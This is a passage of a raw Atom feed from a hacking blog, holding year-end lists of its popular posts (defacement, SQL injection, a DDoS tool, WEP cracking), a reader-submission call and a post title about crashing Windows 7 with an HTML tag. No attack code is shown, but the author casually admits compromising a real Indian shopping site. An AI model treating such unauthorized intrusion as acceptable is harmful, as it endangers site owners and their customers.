lots of big cloud players available on the internet. The problem arises when the data from one cloud storage(eg. google) has to be transferred to another cloud storage(eg amazon). This is really a major issue these days and companies are&amp;nbsp;battling over it. Probably a hbrid cloud can be a solution o this problem which can allow a seemless data transfer from one cloud to another. It can be seen like a new internet within the internet.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;IT Security&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-i9cm8o97IWk/TwddAnoVbRI/AAAAAAAABCE/R0Qjgf2dPjs/s1600/sec.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;149&quot; src=&quot;http://3.bp.blogspot.com/-i9cm8o97IWk/TwddAnoVbRI/AAAAAAAABCE/R0Qjgf2dPjs/s200/sec.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;It was&amp;nbsp;surprising&amp;nbsp;for me to see that no one talked about IT security when I asked for an article on technologies of 2012. Obviously security is nothing new. But I personally believe that IT security is going to re-born in 2012. The reason is quiet evident in 2011. The year 2011 has been the &quot;Year Of Hacks&quot; where almost every major online company was made a victim in some form or the other. CEO&#39;s will surely spend some serious money for IT security this year so we may see some big changes in this sector. Use of better authentication features, protocol updates, cloud security, on-demand security can be some of the rising sectors. I am really looking forward to see how the industry responds back to security in 2011 as you all know what disasters have happened in 2011. Lets see&amp;nbsp;weather&amp;nbsp;we have learnt some lessons or not.&lt;br /&gt;&lt;br /&gt;These are a few technologies to eye on for this year. We have an entire year ahead&amp;nbsp;in-front&amp;nbsp;of us and will surely bring lots of&amp;nbsp;surprises. This sector changes almost every day. Nothing can really be predicted about success or failure. Lets see how this year shapes up in terms of technology growth. Share your suggestions and comments.&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/8440642449543357091/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2012/01/technologies-that-will-heat-up-in-2012.html#comment-form' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8440642449543357091'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8440642449543357091'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2012/01/technologies-that-will-heat-up-in-2012.html' title='Technologies that will heat up in 2012'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-D3_K5aeq9cM/TwdNAwgwsmI/AAAAAAAABAs/rD-r0jfB0m0/s72-c/tab.jpg" height="72" width="72"/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-8600500936676967292</id><published>2012-01-01T01:08:00.000+05:30</published><updated>2012-01-01T01:08:57.058+05:30</updated><title type='text'>BlogRoll 2011 - Top 5 Articles of 2011 on HackingAlert</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-cjWJ6vIWFJY/Tv9kLMxRXSI/AAAAAAAABAk/xHkFXnKA5fU/s1600/favicon.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-cjWJ6vIWFJY/Tv9kLMxRXSI/AAAAAAAABAk/xHkFXnKA5fU/s1600/favicon.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hope you liked the first part of the blog roll.&lt;br /&gt;Here is the final release of the blog roll to close the year 2011. Continuing from the previous roll, here are the top 5 posts for the year 2011. Again I will thank all the readers for their support.&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/09/complete-guide-to-defacing-website.html&quot; target=&quot;_blank&quot;&gt;5. Complete guide to defacing a website - CookBook&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;This article created a revolution on HackingAlert. Special thanks to team innobuzz for providing the shell upload. The article&amp;nbsp;&lt;/span&gt;received&lt;span style=&quot;font-family: inherit;&quot;&gt;&amp;nbsp;a positive feedback and backed lots of page views. Views: 8000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/09/complete-guide-to-defacing-website.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/12/complete-guide-to-staying-anonymous-on.html&quot; target=&quot;_blank&quot;&gt;4. Complete guide to staying anonymous on the internet&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Again this article hit the security people and learners strongly. Actually this post was an outcome of simple social engineering that we can think of while using internet. There is nothing too special about the technique in this article, yet it appeared as a complete alien tutorial. Views: 6000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/12/complete-guide-to-staying-anonymous-on.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/11/setting-up-your-own-pentestinghacking.html&quot; target=&quot;_blank&quot;&gt;3. Setting up your own penetration testing/Hacking network using a single machine&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;This article was the outcome of inspiration that I&amp;nbsp;&lt;/span&gt;received&lt;span style=&quot;font-family: inherit;&quot;&gt;&amp;nbsp;from Sachin Rashte sir and Vivek Ramachandran Sir. I dedicate this article to them. This article featured on SecurityXploded and StudentSphere Magazine.&lt;/span&gt;&lt;br /&gt;Views: 3000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/11/setting-up-your-own-pentestinghacking.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/basic-sql-injection-tutorial-readers.html&quot; target=&quot;_blank&quot;&gt;2. Basic SQL injection tutorial - Readers Choice&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;This article is probably the coolest articles as it had a contribution from one of the top hackers of antisec. The tricks and queries in this article are unique and it fell like an atom bomb on my readers. People were so obsessed by this article that they started testing it on my blog :-) . I have posted several articles on SQL injection but the uniqueness of this post made it stand out of the crowd. It is certainly one of the top pages in Google search. Views:9000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/basic-sql-injection-tutorial-readers.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/complete-guide-to-refref-dos-tool.html&quot; target=&quot;_blank&quot;&gt;1. Complete Guide to #refref DDOS tool&amp;nbsp;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This article is&amp;nbsp;undoubtedly the number one for me. HackingAlert was the first blog to report about the launch of this tool and provided a tutorial over it. It soon got copied on many websites but thanks to google that it always kept me on top for search query &quot;#refref&quot; . This article is still a hot topic on the blog and attracts several visitors daily. The success of this article almost landed me through to the most talked about hactivist group, anonymous. I am happy I didnt join it. Views: 13000+&amp;nbsp; &lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/complete-guide-to-refref-dos-tool.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This was a recap of 2011. Time to say good bye to this year. Hope 2012 brings out the best of HackingAlert to its readers. Wish you all a very happy and Hackful new year!!&lt;br /&gt;&lt;br /&gt;Darklord!!&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/8600500936676967292/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2012/01/blogroll-2011-top-5-articles-of-2011-on.html#comment-form' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8600500936676967292'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8600500936676967292'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2012/01/blogroll-2011-top-5-articles-of-2011-on.html' title='BlogRoll 2011 - Top 5 Articles of 2011 on HackingAlert'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-cjWJ6vIWFJY/Tv9kLMxRXSI/AAAAAAAABAk/xHkFXnKA5fU/s72-c/favicon.PNG" height="72" width="72"/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-5927571261528316402</id><published>2011-12-31T15:36:00.000+05:30</published><updated>2011-12-31T16:04:52.314+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><category scheme="http://www.blogger.com/atom/ns#" term="technology news"/><title type='text'>BlogRoll 2011 - Most Popular Tutorials on HackingAlert</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-W0vx2BMYwpM/Tv7b4PkYx3I/AAAAAAAABAY/t6WQD6VPWsU/s1600/favicon.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-W0vx2BMYwpM/Tv7b4PkYx3I/AAAAAAAABAY/t6WQD6VPWsU/s1600/favicon.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hello Friends. The end of 2011 is approaching. HackingAlert had lots of special memories. lots of tutorials and articles were posted. Some were disliked, some were appriciated and some became a Hit on Internet. This year, Hackingalert posted a total of 156 blog posts which counts to about 3 lakh page views for this year.&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;This yar has been excellient in terms of stats. Well we will talk about the stats later. Here I am presenting a blog roll of my previous posts of 2011. I have selected top 15 articles out of 150 odd articles. The selection was based on number of views, number of comments and my personal likeness as well :-) .&lt;br /&gt;In this blog roll I will list the bottom 10 articles out of 15. Then in the next roll I will post about the remaining top 5 articles. So let us remember and re-live the memories again. Here goes the countdown&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/03/how-to-hack-websiteweb-server-3-step.html&quot; target=&quot;_blank&quot;&gt;15. How to Hack a Website/Web server - 3 step guide&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;When I posted this article in March, I was completely new to defacements. But I soon caught up the speed. I never went on a defacement rampage but I did report some vulnerabilities in around 10 websites. Its a good startup tutorial. Views: 2000+ . &lt;a href=&quot;http://hackingalert.blogspot.com/2011/03/how-to-hack-websiteweb-server-3-step.html&quot; target=&quot;_blank&quot;&gt;Read the article.&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/06/two-biggest-truths-about-hacking.html&quot; target=&quot;_blank&quot;&gt;14. two Biggest truths about Hacking Gmail, Hotmail,Facebook, Yahoo etc.&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;To be true, I wrote this article out of&amp;nbsp;frustration. Every day I used to get lots of mails, FB messages, tweets regarding hacking accounts. There is a big misconception amongst people that any hacker can hack into these accounts. Views : 2500+ .&lt;a href=&quot;http://hackingalert.blogspot.com/2011/06/two-biggest-truths-about-hacking.html&quot; target=&quot;_blank&quot;&gt; read the article&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/dummies-guide-to-windows-firewall.html&quot; target=&quot;_blank&quot;&gt;13. Dummies Guide to Windows Firewall&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This is one of the less read yet popular posts. The reason why it became popular was its uniqueness. It attracted some professional network admins who appriciated this post alot. Yet it remained a less known post on HackingAlert. Views : 1000+. &amp;nbsp;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/dummies-guide-to-windows-firewall.html&quot; target=&quot;_blank&quot;&gt;read the article&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/07/intercepting-http-requestresponse-using.html&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;12. Intercepting HTTP Request/Response using Webscarab to Hack Web applications&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I came to know about intercepting HTTP requests as a potential technique while I was preparing for an Interview for one of the top infosec companies. The technique striked me and I went ahead to compromise one of the popular online shopping carts of India. Views: 2000+ .&lt;a href=&quot;http://hackingalert.blogspot.com/2011/07/intercepting-http-requestresponse-using.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/how-to-crack-wifi-wep-password-in.html&quot; target=&quot;_blank&quot;&gt;11. How to crack Wifi WEP password in simple steps.&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;I dont take the credit for this post. I learnt it from tutorials and then posted it. same tutorial is available on several websites but it is certainly one of the most views tutorials on HackingAlert. Google search on &quot;Hacking Wifi&quot; lists this tutorial amongst top 4 websites so it has&amp;nbsp;received&amp;nbsp;lots of hits. Views : 6000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/how-to-crack-wifi-wep-password-in.html&quot; target=&quot;_blank&quot;&gt;Read the article.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/08/difference-between-ddr2-and-ddr3-ram.html&quot; target=&quot;_blank&quot;&gt;10. Difference Between DDR2 and DDR3 RAM&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This post has an interesting story. I upgraded my laptop from 2 GB RAM to 4 GB. My laptop had Win7 32 bit. When I went to system properties it said RAM=4 GB( 3 GB usable) . WHAT? 3 GB usable. where did the other 1 GB go? Dont know the answer? Click to read. Thanks to Google again. It lists as the top result when you search for Diffrence between RAMs. Views: 5000+ . &lt;a href=&quot;http://hackingalert.blogspot.com/2011/08/difference-between-ddr2-and-ddr3-ram.html&quot; target=&quot;_blank&quot;&gt;Read the article&amp;nbsp;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/09/great-browser-war-unleashed-2011.html&quot; target=&quot;_blank&quot;&gt;9. The Great Browser War Unleashed- 2011 edition&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Well I dont want to brag but here is the truth about this article. Last year I posted the 2010 browser war and it featured in 2 IT magazines. When I posted it this year in October, It featured &amp;nbsp;in 2 magazines, 5 online portals and numerous forums. Many readers recognize HackingAlert as a blog that ranks browsers exceptionally. I an still waiting for the day when browsers will pay me to get higher rank in my article :-) .&lt;br /&gt;Views : 6000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/09/great-browser-war-unleashed-2011.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/07/basics-of-nic-mac-and-arp-complete.html&quot; target=&quot;_blank&quot;&gt;8. Basics of NIC MAC &amp;amp; ARP , Art of ARP spoofing/flooding&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This article dates back to the time when I was preparing for company interview. So in order to revise and strengthen my concepts of Networking, I wrote this post and I&amp;nbsp;received&amp;nbsp;quiet an&amp;nbsp;appreciation&amp;nbsp;for it. The article was not a hit among common readers but it was an eye catcher for learners. Views:4000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/07/basics-of-nic-mac-and-arp-complete.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/understand-port-scanning-in-detail.html&quot; target=&quot;_blank&quot;&gt;7. Understanding port scanning in detail&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This is again a post that came out of my random experiences. I was put up a question that what is the difference between a SYN scan and TCP scan. Damn, I had no answer. So I went ahead to do a detailed study on port scanning and here is the outcome of it :-) . Views: 5000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/understand-port-scanning-in-detail.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/09/practical-reverse-engineering-tutorial.html&quot; target=&quot;_blank&quot;&gt;6. Practical Reverse Engineering tutorial - Cracking Winrar&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;I wrote this post when I was on a rampage to learn about Computer architecture, assembly and reverse engineering? But why did I suddenly shift to Architecture and reverse engineering?? Yup, again I was put up a question, Mr. Abhinav What experience do you have in Reverse Engineering and Assembly?&lt;br /&gt;Views: 4000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/09/practical-reverse-engineering-tutorial.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This is not just a blog roll. Its my learning curve. I never sat down to decide that yes I have to write on this topic today. I simply shared my learning experience with all my readers. And I am really happy that people&amp;nbsp;appreciated&amp;nbsp;me, supported me and gave suggestions.&lt;br /&gt;&lt;br /&gt;In the next blog roll I will post about my top 5 posts for this year. They are also the outcome of my hell experience with computer network security and hacking.&lt;br /&gt;&lt;br /&gt;Remember :&amp;nbsp;Knowledge&amp;nbsp;is power when it is shared.&lt;br /&gt;Happy new year 2012.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/5927571261528316402/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/blogroll-2011-most-popular-tutorials-on.html#comment-form' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/5927571261528316402'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/5927571261528316402'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/blogroll-2011-most-popular-tutorials-on.html' title='BlogRoll 2011 - Most Popular Tutorials on HackingAlert'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-W0vx2BMYwpM/Tv7b4PkYx3I/AAAAAAAABAY/t6WQD6VPWsU/s72-c/favicon.PNG" height="72" width="72"/><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-1371864891833442645</id><published>2011-12-30T16:02:00.000+05:30</published><updated>2011-12-30T16:02:38.750+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><category scheme="http://www.blogger.com/atom/ns#" term="technology news"/><title type='text'>Contribute to HackingAlert : Submit An Article on Technologies that will heatup in 2012</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-2CMesgMCtX4/Tv2NoNHdUNI/AAAAAAAABAM/yh6GdCqj1EM/s1600/driving.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;169&quot; src=&quot;http://3.bp.blogspot.com/-2CMesgMCtX4/Tv2NoNHdUNI/AAAAAAAABAM/yh6GdCqj1EM/s320/driving.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hello friends. HackingAlert had a glorious 2011 and its full credit goes to you readers. Its your support and suggestions which has kept me going. Even with scarcity of time, I still had to push myself to write on the blog and I was able to make that extra push just because of the encouragement I got from you all.&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;I am thankful to all of you. So I have decided to post the first article of 2012 which is contributed by my readers.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Topic : Technologies that will heat up in 2012&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;I have picked up a simple and less technical article so that maximum people can contribute. You have to write an article on those technologies which you think can be &quot;THE TECH-NEX&quot; for 2012. You can search on the internet and do your own mini research to figure out what can be the best technologies for 2012.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Here are a few guidelines:&amp;nbsp;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;You dont have to give a complete technical description of the technology. Just describe the technology and the reason why it will grow strongly in 2012 (around 150 words per technology). Make sure you use your own words to describe the technology.&lt;br /&gt;&lt;br /&gt;You can submit maximum 5 technologies. Not more than that.&lt;br /&gt;&lt;br /&gt;Dont be gadget specific. Like &quot;iphone 5&quot;. What I mean is that iphone is a gadget, not a technology. Infact there is a new processor that will be&amp;nbsp;implemented&amp;nbsp;in iphone that can be a revolution in 2012( guess!!). So focus on the technology that any revolutionary gadget&amp;nbsp;implements.&lt;br /&gt;&lt;br /&gt;Make sure you choose those technologies which are relevant in the field of Computers and internet. ( dont choose a micro-biological tech ;-) )&lt;br /&gt;&lt;br /&gt;Here is a sample article for you which I wrote last year - &lt;a href=&quot;http://hackingalert.blogspot.com/2011/01/7-technologies-that-will-heat-up-2011.html&quot; target=&quot;_blank&quot;&gt;Technologies that will heat up in 2011&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Submit your entries before 2 January 2012. The article will be published on 4 Jan 2012.&lt;br /&gt;&lt;br /&gt;You can create a word document and submit your article at abhinavbom@gmail.com.&lt;br /&gt;At the end of the article mention your Name, Email address, URL(optional) and your photograph(optional). In case your technology is selected for the article then we will publish it along with your photograph.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Something for everyone:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;All my readers are equally important for me. So this is not a competition. There can be chances that the same technology is submitted by many contributors.&lt;br /&gt;So I will publish the name and photograph(in case you have submitted photograph) of all those who have submitted that technology.&lt;br /&gt;&lt;br /&gt;In the final article I will choose around 7-8 technologies so you have all chances to star on HackingAlert :) .&lt;br /&gt;&lt;br /&gt;I will encourage all of you to make maximum participation in this small event and make it the&amp;nbsp;successful&amp;nbsp;start for the year 2012.&lt;br /&gt;No one&#39;s entries will be neglected. Anyone who contributes an article will be featured on the blog. So I want maximum people to participate.&lt;br /&gt;&lt;br /&gt;Wish you all HAPPY NEW YEAR......Good luck for the article.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/1371864891833442645/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/contribute-to-hackingalert-submit.html#comment-form' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1371864891833442645'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1371864891833442645'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/contribute-to-hackingalert-submit.html' title='Contribute to HackingAlert : Submit An Article on Technologies that will heatup in 2012'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-2CMesgMCtX4/Tv2NoNHdUNI/AAAAAAAABAM/yh6GdCqj1EM/s72-c/driving.jpg" height="72" width="72"/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-8044439991634909724</id><published>2011-12-25T15:23:00.001+05:30</published><updated>2011-12-25T15:23:53.873+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="windows 7"/><title type='text'>A simple HTML tag to crash 64-bit Windows 7</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: 